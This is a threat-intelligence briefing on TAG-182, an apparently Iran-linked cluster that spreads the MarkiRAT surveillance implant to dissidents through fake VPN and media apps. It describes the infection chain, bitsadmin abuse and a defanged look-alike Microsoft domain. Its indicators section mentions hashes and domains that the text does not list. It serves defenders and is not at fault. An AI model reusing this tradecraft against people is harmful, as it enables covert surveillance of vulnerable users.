Iran ramps up dissident surveillance with fake VPN and media apps

Iran's security services are leaning harder on digital surveillance now that the summer's fighting with Israel and the United States has cooled, and researchers say a threat cluster tracked as TAG-182 is a growing part of that effort. Recorded Future's Insikt Group has uncovered fresh infrastructure the group uses to spread MarkiRAT, a Windows surveillance implant aimed at Iranians at home and abroad.

Who is being targeted

According to the Insikt Group report, TAG-182 lures victims with fake VPN and media-player apps promoted through social media, including Instagram. The bogus tools carry names like "Pis2ray VPN" and "YESHICA YEPlayer," none of which are legitimate listings on Google Play or Apple's App Store. The targeting fits Tehran's playbook of monitoring perceived dissidents and alleged foreign collaborators, and Recorded Future assesses this activity is highly likely to intensify following the partial restoration of internet access in Iran on May 26, 2026.

The link to Ferocious Kitten

MarkiRAT is not new. It has long been tied to Ferocious Kitten, an Iran-nexus group known for spying on activists and human-rights advocates inside the country. The new samples share distinctive tradecraft with those older ones, notably the abuse of the Background Intelligent Transfer Service (bitsadmin) to fetch payloads, which suggests a credible relationship between TAG-182 and Ferocious Kitten. Recorded Future stops short of saying the two are organizationally the same, noting more evidence is needed. It is the latest in a long line of Iranian personal-data harvesting operations built for surveillance rather than sabotage.

How the attack works

Victims who install a lure such as YEPlayer trigger a download of YEPlayer.rar from attacker infrastructure, which keeps serving the payload even when the page shows an error, a sign of deliberate staging. Once YEPlayer.exe runs, MarkiRAT beacons out with a multipart upload to a look-alike Microsoft-themed domain (for example microsotf[.]comi-site[.]website) and drops a file named svehost.exe that impersonates the legitimate Windows svchost.exe. The group favors Let's Encrypt certificates and domains that mimic Microsoft, Google, and social-media brands.

Indicators of compromise

Farsi-speaking users, especially in the diaspora, should avoid VPN and media apps shared through social-media links or unofficial sites, and defenders serving these communities should watch for the domains and hashes above.

This briefing is provided by IntelFusions for informational and defensive purposes only. It is based on sources assessed to be reliable at the time of writing, and analytic judgments carry the confidence levels indicated. Indicators of compromise are defanged; re-arm them only in controlled environments. IntelFusions is not affiliated with the organizations named and makes no warranty as to completeness or accuracy.

Read the full analysis on IntelFusions